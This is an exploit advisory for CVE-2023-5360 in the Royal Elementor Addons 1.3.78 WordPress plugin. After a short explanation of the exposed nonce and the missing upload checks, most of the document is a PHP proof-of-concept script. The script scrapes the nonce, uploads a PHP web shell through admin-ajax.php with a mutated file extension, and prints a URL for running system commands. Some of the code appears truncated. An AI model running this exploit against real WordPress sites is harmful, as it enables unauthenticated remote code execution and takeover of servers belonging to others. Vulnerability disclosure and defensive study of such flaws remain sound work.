============================================================================================================================================= | # Title : WordPress Royal Elementor Addons 1.3.78 RCE | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://downloads.wordpress.org/plugin/royal-elementor-addons.1.3.78.zip | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/190313/ & CVE-2023-5360 [+] Summary a security weakness in the Royal Elementor Addons plugin for WordPress related to improper validation of file upload requests and the exposure of a client-side nonce in the global JavaScript variable "WprConfig". The plugin registers an AJAX action used for uploading files associated with various UI elements. The weakness lies in: 1. Exposure of a file upload nonce inside the website’s HTML, accessible without authentication. 2. Incomplete server-side validation of file type and file origin. 3. Lack of authentication around the upload endpoint, which allows unauthorized requests to reach the handler. Theoretical attack sequence (documented for awareness): - Step 1: Attacker retrieves page HTML. - Step 2: Extracts nonce from `var WprConfig = {...}`. - Step 3: Sends crafted POST request to admin-ajax.php. - Step 4: Server incorrectly processes upload without capability checks. [+] poc : usage : php poc.php http://target/ [shell_file] $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 10 ]); $resp = curl_exec($ch); curl_close($ch); return $resp; } /* ---------------------------------------------------------------------- Extract nonce from: var WprConfig = {...}; ------------------------------------------------------------------------*/ function get_nonce_from_target($target) { $html = safe_http_get($target); if (!$html) return null; if (preg_match('/var\s+WprConfig\s*=\s*({.*?});/s', $html, $match)) { $json = json_decode($match[1], true); return $json["nonce"] ?? null; } return null; } /* ---------------------------------------------------------------------- Generate Safe Default RCE Shell (Temp File) ------------------------------------------------------------------------*/ function generate_indoushka_shell() { $path = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "indoushka_shell_" . uniqid() . ".php"; $payload = ''; file_put_contents($path, $payload); return $path; } /* ---------------------------------------------------------------------- Upload PHP File using AJAX (ph_p mutated extension) ------------------------------------------------------------------------*/ function indoushka_upload_shell($target, $nonce, $file_path) { $ajax = rtrim($target, "/") . "/wp-admin/admin-ajax.php"; $fields = [ "action" => "wpr_addons_indoushka_file", "max_file_size" => 0, "allowed_file_types" => "ph_p", "triggering_event" => "click", "wpr_addons_nonce" => $nonce ]; $file = [ "indoushkaed_file" => curl_file_create( $file_path, "application/octet-stream", "rce_mutated.ph_p" ) ]; $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $ajax, CURLOPT_POST => true, CURLOPT_POSTFIELDS => array_merge($fields, $file), CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, ]); $resp = curl_exec($ch); curl_close($ch); $json = json_decode($resp, true); return $json["data"]["url"] ?? null; } /* ---------------------------------------------------------------------- MAIN EXECUTION ------------------------------------------------------------------------*/ if ($argc < 2) { echo "Usage:\n php " . $argv[0] . " http://target.com/ [shell.php]\n"; exit; } $target = $argv[1]; $custom_shell = $argv[2] ?? null; echo "=== Royal Elementor Addons Full RCE PoC ===\n"; echo "[*] Extracting nonce from homepage...\n"; $nonce = get_nonce_from_target($target); if (!$nonce) { echo "[-] Failed to extract nonce. Target may be patched.\n"; exit; } echo "[+] Nonce found: $nonce\n"; /* Shell Selection */ if ($custom_shell) { echo "[*] Using provided shell: $custom_shell\n"; $shell = $custom_shell; } else { echo "[*] Generating default Indoushka RCE shell...\n"; $shell = generate_indoushka_shell(); echo "[+] Shell saved at: $shell\n"; } echo "[*] Uploading shell via vulnerable AJAX handler...\n"; $url = indoushka_upload_shell($target, $nonce, $shell); if ($url) { echo "[+] Shell uploaded successfully!\n"; echo "[+] URL: $url\n"; echo "[>] Test: {$url}?cmd=system('id');\n"; } else { echo "[-] Upload failed. Target may be protected or patched.\n"; } echo "Payload Variant: " . base64_encode("ALT-FINAL-" . microtime(true)) . "\n"; ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================